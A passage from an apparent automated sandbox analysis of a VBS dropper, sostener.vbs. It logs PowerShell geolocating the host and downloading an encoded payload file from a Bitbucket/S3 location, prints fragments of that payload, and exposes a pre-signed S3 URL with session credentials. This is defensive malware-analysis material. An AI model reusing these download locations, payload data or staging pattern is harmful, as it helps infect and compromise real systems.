                                                                                                      content-type: application/json; charset=utf-8
                                                                                                      cache-control: public, max-age=300
                                                                                                      access-control-allow-origin: *
                                                                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                      Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.749737185.166.143.494437104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-11-20 08:36:20 UTC110OUTGET /hector4576--/noviembre19/downloads/sos19nov.txt HTTP/1.1
                                                                                                      Host: bitbucket.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-11-20 08:36:21 UTC5769INHTTP/1.1 302 Found
                                                                                                      Date: Wed, 20 Nov 2024 08:36:21 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Content-Length: 0
                                                                                                      Server: AtlassianEdge
                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNE [TRUNCATED]
                                                                                                      Expires: Wed, 20 Nov 2024 08:36:21 GMT
                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                      X-Used-Mesh: False
                                                                                                      Vary: Accept-Language, Origin
                                                                                                      Content-Language: en
                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                      X-Dc-Location: Micros-3
                                                                                                      X-Served-By: 87806a2e7092
                                                                                                      X-Version: 8a5953c2822d
                                                                                                      X-Static-Version: 8a5953c2822d
                                                                                                      X-Request-Count: 2026
                                                                                                      X-Render-Time: 0.04147911071777344
                                                                                                      X-B3-Traceid: c138cafa24844290915ba566f6e52837
                                                                                                      X-B3-Spanid: f9940804bbb52345
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config- [TRUNCATED]
                                                                                                      X-Usage-Quota-Remaining: 999301.534
                                                                                                      X-Usage-Request-Cost: 710.77
                                                                                                      X-Usage-User-Time: 0.021323
                                                                                                      X-Usage-System-Time: 0.000000
                                                                                                      X-Usage-Input-Ops: 0
                                                                                                      X-Usage-Output-Ops: 0
                                                                                                      Age: 0
                                                                                                      X-Cache: MISS
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                      Atl-Traceid: c138cafa24844290915ba566f6e52837
                                                                                                      Atl-Request-Id: c138cafa-2484-4290-915b-a566f6e52837
                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                      Server-Timing: atl-edge;dur=151,atl-edge-internal;dur=3,atl-edge-upstream;dur=150,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.74974752.217.196.574437104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-11-20 08:36:21 UTC1235OUTGET /ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-4933-9209-c427ee8593c3/sos19nov.txt?response-content-disposition=attachment%3B%20filename%3D%22sos19nov.txt%22&AWSAccessKeyId=ASIA6KOSE3BNAFA7CVMF&Signature=CrqtinwQM9TwM0anNtAwVi%2FidaU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIAKzZNZVNquQX%2BXMBwIz3Gvp%2FzjvC75dgiHgFrLVQIrzAiEAyI%2BZsi%2BwpMDAd330CJIQTPVFocQWII%2BkpnE7UVC%2BwdIqsAIIiv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJnUG9TTIzYCxgnmbCqEAt0YUQ4Qb48el4w9P01DiBwFyGBLP%2BC%2BM7M%2BQgpF6ZxRMLViqwNLPWKBCNcN6xbQ%2BWj9KOJJ40F9GMTKMGmSrRDa7Sw%2B2BVBoDUFg67l4vBd6pqKGeBX%2FfGU3tPxGALlmzyQ4YTla7QXvlf1JNUj3XCK%2B5NpynyKTH12PVJfQAMWSDPYFBK9dDBXze8JvTItxPBnjCxudqV9nsVaS%2F9bbevYEMeURk4H91sf6bdcXClhveK6km9qD7ElBzIYd6iXaf55cVFeGNhva9QwPSLjcwS7muN%2F1rYtl9xshGU27AuU6lZnBs3nMfKNZb7KwfIYM8woGd4YEbv9d3Klr6E8MYC8QEIOMJi69rkGOp0BH0DycpkzBfU%2FgJlwSbJ7VuYKCAg6AvvthUTyyFvJgPvFXtLaetF5p0abeOwV8y33NNEU8mMXjgJqQ080SNiFV835eFr%2BbBRHNf7rm1neySGwg [TRUNCATED]
                                                                                                      Host: bbuseruploads.s3.amazonaws.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-11-20 08:36:22 UTC527INHTTP/1.1 200 OK
                                                                                                      x-amz-id-2: bLPMfv6UQb3STaxVzeneKmxycJoOyOTGqd1HNhk4VeVkD3zYiNVJzA14iie3+FdIzVuNkEjw7kQ=
                                                                                                      x-amz-request-id: 5Q8NBY110QCEPMAW
                                                                                                      Date: Wed, 20 Nov 2024 08:36:23 GMT
                                                                                                      Last-Modified: Tue, 19 Nov 2024 15:37:57 GMT
                                                                                                      ETag: "bc1f315918dbb41727df210bd2732eb2"
                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                      x-amz-version-id: J1n0anmS_6qIm97U5NPPILk9y5.Qa7NW
                                                                                                      Content-Disposition: attachment; filename="sos19nov.txt"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Length: 657408
                                                                                                      Server: AmazonS3
                                                                                                      Connection: close
                                                                                                      2024-11-20 08:36:22 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44
                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nD
                                                                                                      2024-11-20 08:36:22 UTC497INData Raw: 30 59 4d 4e 42 54 54 74 30 41 4c 4e 6b 53 7a 6e 30 4d 4a 4e 37 51 6a 44 7a 30 2f 4d 32 50 44 30 7a 51 38 4d 36 4f 6a 72 7a 67 36 4d 61 4e 54 4e 79 38 76 4d 62 4c 7a 76 79 4d 55 4d 61 48 6a 49 41 41 41 41 59 43 51 41 41 41 77 50 4f 2b 44 61 2f 41 6b 50 72 37 6a 35 2b 45 4a 50 37 79 44 6f 38 73 4a 50 56 79 54 68 38 30 46 50 49 77 7a 41 37 6f 54 4f 35 68 7a 73 34 4d 35 4e 64 66 6a 30 31 55 65 4e 6f 53 6a 65 30 55 57 4d 6f 48 6a 76 41 41 41 41 38 41 41 41 77 44 41 41 41 6b 6a 72 35 41 5a 4f 6e 68 7a 79 34 30 4b 4f 65 65 44 49 33 4d 67 4e 32 62 7a 35 32 4d 73 4e 39 61 7a 6a 32 51 6e 4e 57 5a 44 54 32 55 51 4e 70 58 7a 33 31 55 58 4e 6d 56 54 59 31 77 56 4e 62 55 6a 46 30 4d 4c 4e 59 4d 7a 31 7a 41 38 4d 42 4f 7a 63 7a 30 32 4d 54 4d 6a 44 79 38 76 4d 38 4a 44
                                                                                                      Data Ascii: 0YMNBTTt0ALNkSzn0MJN7QjDz0/M2PD0zQ8M6Ojrzg6MaNTNy8vMbLzvyMUMaHjIAAAAYCQAAAwPO+Da/AkPr7j5+EJP7yDo8sJPVyTh80FPIwzA7oTO5hzs4M5Ndfj01UeNoSje0UWMoHjvAAAA8AAAwDAAAkjr5AZOnhzy40KOeeDI3MgN2bz52MsN9azj2QnNWZDT2UQNpXz31UXNmVTY1wVNbUjF0MLNYMz1zA8MBOzcz02MTMjDy8vM8JD
                                                                                                      2024-11-20 08:36:22 UTC16384INData Raw: 41 41 4f 34 6a 6a 38 34 77 4e 4f 33 69 6a 73 34 67 4b 4f 43 69 6a 5a 34 73 46 4f 4e 68 54 4f 34 41 77 4e 77 66 54 32 33 55 36 4e 53 65 54 69 33 63 6e 4e 79 62 44 32 32 41 73 4e 43 5a 54 4e 31 59 63 4e 73 57 7a 70 31 30 5a 4e 77 56 7a 4e 31 55 53 4e 56 51 54 30 30 45 4d 4e 49 53 44 4c 7a 49 61 4d 51 41 6a 73 77 45 48 4d 6c 42 44 4b 77 63 42 4d 43 41 41 41 41 67 4f 41 41 41 4e 41 41 41 77 50 61 2b 6a 52 2f 77 7a 50 43 34 44 2f 2b 45 72 50 6c 36 44 4a 2b 63 52 50 32 32 54 71 39 63 58 50 66 78 54 36 38 67 4e 50 79 79 6a 6c 38 55 48 50 42 73 44 2f 37 6b 37 4f 30 75 6a 44 37 67 67 4f 56 72 6a 70 36 49 71 4f 65 71 6a 6d 36 59 70 4f 53 71 6a 6a 36 6f 6f 4f 47 71 6a 47 36 59 51 4f 5a 6e 6a 79 35 4d 63 4f 38 6d 6a 65 35 73 57 4f 6f 6b 54 47 35 59 41 4f 38 6a 54 30
                                                                                                      Data Ascii: AAO4jj84wNO3ijs4gKOCijZ4sFONhTO4AwNwfT23U6NSeTi3cnNybD22AsNCZTN1YcNsWzp10ZNwVzN1USNVQT00EMNISDLzIaMQAjswEHMlBDKwcBMCAAAAgOAAANAAAwPa+jR/wzPC4D/+ErPl6DJ+cRP22Tq9cXPfxT68gNPyyjl8UHPBsD/7k7O0ujD7ggOVrjp6IqOeqjm6YpOSqjj6ooOGqjG6YQOZnjy5McO8mje5sWOokTG5YAO8jT0
                                                                                                      2024-11-20 08:36:22 UTC1024INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 53 2f 7a 50 2f 4d 2f 53 4c 74 30 38 4b 70 6b 53 7a 76 30 53 4c 4e 2f 53 4c 74 55 39 48 64 6b 52 2f 66 33 64 4d 2b 50 36 6f 54 2f 2f 74 33 2b 39 2f 62 74 31 6e 2f 2f 6c 58 57 38 2f 66 2b 5a 31 2f 37 72 76 77 2f 2f 32 62 2f 2f 2f 34 6a 76 2f 2f 48 65 34 75 2f 50 36 6f 50 2f 2f 75 37 75 39 2f 76 36 71 50 6e 76 59 69 70 32 38 66 39 6c 58
                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAS/zP/M/SLt08KpkSzv0SLN/SLtU9HdkR/f3dM+P6oT//t3+9/bt1n//lXW8/f+Z1/7rvw//2b///4jv//He4u/P6oP//u7u9/v6qPnvYip28f9lX
                                                                                                      2024-11-20 08:36:22 UTC16384INData Raw: 54 48 64 30 39 50 64 30 52 33 2f 30 52 48 64 2f 62 6e 64 32 64 2f 51 44 4e 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6b 50 78 45 54 38 2f 55 54 4e 31 2f 52 46 56 55 2f 48 56 55 52 39 66 55 52 46 31 2f 51 42 46 55 2f 6e 55 53 4b 39 76 6a 4f 43 37 2f 6b 53 36 31 2f 4c 71 6f 56 2f 76 6f 69 57 39 2f 69 4b 61 31 2f 4c 71 6f 56 2f 76 6f 69 57 39 2f 69 4b 61 31 2f 4c 71 6f 56 2f 76 6f 69 57 39 2f 69 4b 61 31 2f 48 58 63 47 2b 66 54 4e 74 30 2f 52 46 56 55
                                                                                                      Data Ascii: THd09Pd0R3/0RHd/bnd2d/QDNEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkPxET8/UTN1/RFVU/HVUR9fURF1/QBFU/nUSK9vjOC7/kS61/LqoV/voiW9/iKa1/LqoV/voiW9/iKa1/LqoV/voiW9/iKa1/HXcG+fTNt0/RFVU
                                                                                                      2024-11-20 08:36:22 UTC1024INData Raw: 63 55 41 41 43 41 41 41 34 43 41 41 41 67 4c 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 77 41 41 46 35 72 38 41 55 55 77 34 44 51 52 2b 53 50 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 69 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 67 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                      Data Ascii: cUAACAAA4CAAAgLAAAAAAAAAAAAAAAAAAAAIAAAAwAAF5r8AUUw4DQR+SPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                      2024-11-20 08:36:22 UTC1749INData Raw: 6c 6d 63 30 4e 46 64 75 56 57 62 75 39 6d 63 70 5a 6e 62 46 56 57 5a 79 5a 55 41 68 42 41 41 58 4e 33 5a 75 6c 6d 63 30 4e 46 64 75 56 57 62 75 39 6d 63 70 5a 6e 62 46 52 58 5a 48 46 67 32 41 63 56 5a 75 6c 47 54 6b 35 57 59 74 31 32 62 44 52 58 5a 48 46 77 68 41 45 55 5a 75 6c 47 54 6b 35 57 59 74 31 32 62 44 52 58 5a 48 46 67 68 41 41 41 55 44 31 55 52 50 52 58 5a 48 4a 77 4e 41 55 32 5a 68 42 56 5a 6b 39 32 51 6b 6c 47 62 68 5a 31 63 4a 4e 67 43 41 41 51 51 34 56 55 5a 73 6c 6d 52 30 4e 6e 63 70 5a 45 5a 75 6c 6d 52 42 4d 44 41 6a 39 47 62 73 46 55 5a 53 42 58 59 6c 68 6b 41 53 44 41 41 58 56 47 62 76 4e 6e 62 76 4e 45 5a 68 56 6d 55 44 34 4c 41 41 55 47 5a 76 31 55 5a 73 39 32 63 75 39 32 51 30 56 32 52 42 77 4b 41 41 41 31 51 6c 78 32 62 7a 35 32 62
                                                                                                      Data Ascii: lmc0NFduVWbu9mcpZnbFVWZyZUAhBAAXN3Zulmc0NFduVWbu9mcpZnbFRXZHFg2AcVZulGTk5WYt12bDRXZHFwhAEUZulGTk5WYt12bDRXZHFghAAAUD1URPRXZHJwNAU2ZhBVZk92QklGbhZ1cJNgCAAQQ4VUZslmR0NncpZEZulmRBMDAj9GbsFUZSBXYlhkASDAAXVGbvNnbvNEZhVmUD4LAAUGZv1UZs92cu92Q0V2RBwKAAA1Qlx2bz52b
                                                                                                      2024-11-20 08:36:22 UTC9000INData Raw: 41 41 58 52 6d 62 31 39 32 55 35 46 47 62 51 42 51 43 41 41 51 51 6e 35 57 61 79 52 33 55 6b 35 57 5a 54 6c 32 59 74 42 51 4d 41 41 77 56 6e 35 57 61 79 52 33 55 6b 35 57 5a 54 6c 32 59 74 42 67 4d 41 55 32 63 76 78 32 51 75 6c 55 5a 32 46 32 64 41 67 4a 41 41 41 33 62 30 4e 6c 62 4a 56 6d 64 68 64 48 41 6c 43 67 63 6c 52 57 59 6c 68 55 5a 79 46 47 63 6c 4a 48 55 75 6c 55 5a 32 46 32 64 41 49 4b 41 79 56 47 5a 68 56 47 53 6c 4a 58 59 77 56 6d 63 77 35 57 56 75 6c 55 5a 32 46 32 64 41 59 4b 41 41 34 57 5a 77 39 6b 62 4a 56 6d 64 68 64 48 41 68 43 41 64 79 46 47 64 54 35 57 53 6c 5a 58 59 33 42 41 70 41 49 58 5a 6d 5a 57 64 43 52 47 5a 42 35 57 53 6c 5a 58 59 33 42 77 6c 41 77 47 62 6b 35 53 53 51 46 30 56 4d 68 30 55 41 45 30 63 30 4e 58 61 34 56 55 5a 73
                                                                                                      Data Ascii: AAXRmb192U5FGbQBQCAAQQn5WayR3Uk5WZTl2YtBQMAAwVn5WayR3Uk5WZTl2YtBgMAU2cvx2QulUZ2F2dAgJAAA3b0NlbJVmdhdHAlCgclRWYlhUZyFGclJHUulUZ2F2dAIKAyVGZhVGSlJXYwVmcw5WVulUZ2F2dAYKAA4WZw9kbJVmdhdHAhCAdyFGdT5WSlZXY3BApAIXZmZWdCRGZB5WSlZXY3BwlAwGbk5SSQF0VMh0UAE0c0NXa4VUZs
                                                                                                      2024-11-20 08:36:22 UTC16384INData Raw: 41 41 2f 2f 2f 2f 2b 44 41 52 6c 6f 44 41 45 56 69 4b 41 41 41 41 41 41 41 52 6c 49 45 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 41 77 2f 2f 2f 50 31 41 41 41 41 41 38 2f 2f 2f 54 4f 41 41 41 41 41 41 51 6b 49 4b 43 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 54 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 41 41 41 45 6c 52 34 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 2f 2f 2f 2f 51 44 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 41 41 52 55 41 47 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 41 77 2f 2f 2f 50 30 41 41 41 41 41 38 2f 2f 2f 37 50 41 41 41 41 41 41 51 55 43 6f 44 41 41 41 41 77 2f 2f 2f 76 2f 41 41 41 41 41 38 2f 2f 2f 54 4e 41 41 41 41 41 2f 2f 2f 2f 2b 44 41 41 41 41 41 41 44 68 66 61 41 41 41 41 41 38 2f 2f 2f 37 50 41 41
                                                                                                      Data Ascii: AA////+DARloDAEViKAAAAAAARlIEAAAAA////+DAAAAw///P1AAAAA8///TOAAAAAAQkIKCAAAAw///v/AAAAA8///TNAAAAA////+DAAAAAAElR4AAAAA8///7PAAAAA////QDAAAAw///v/AAAAAAARUAGAAAAA////+DAAAAw///P0AAAAA8///7PAAAAAAQUCoDAAAAw///v/AAAAA8///TNAAAAA////+DAAAAAADhfaAAAAA8///7PAA
                                                                                                      2024-11-20 08:36:22 UTC1024INData Raw: 54 4d 43 64 7a 4d 35 55 30 4e 44 56 55 4d 31 6b 7a 4d 35 45 6a 4e 31 45 54 52 35 41 54 4d 47 56 45 4f 78 6b 54 4f 34 51 6a 51 34 49 30 4d 47 56 54 4d 7a 49 55 4f 35 49 55 4e 79 63 54 51 45 4a 54 51 46 56 45 4d 30 55 44 4f 32 49 45 4d 42 46 6a 4d 42 6c 6a 4d 35 59 55 4d 42 6c 7a 51 78 55 45 4f 78 59 54 4f 43 56 30 4d 31 6b 54 4d 31 41 41 41 44 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47
                                                                                                      Data Ascii: TMCdzM5U0NDVUM1kzM5EjN1ETR5ATMGVEOxkTO4QjQ4I0MGVTMzIUO5IUNycTQEJTQFVEM0UDO2IEMBFjMBljM5YUMBlzQxUEOxYTOCV0M1kTM1AAADZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZkRG


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:03:36:04
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                                                                                                      Imagebase:0x7ff6cb1c0000
                                                                                                      File size:170'496 bytes
                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:03:36:05
                                                                                                      Start date:20/11/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
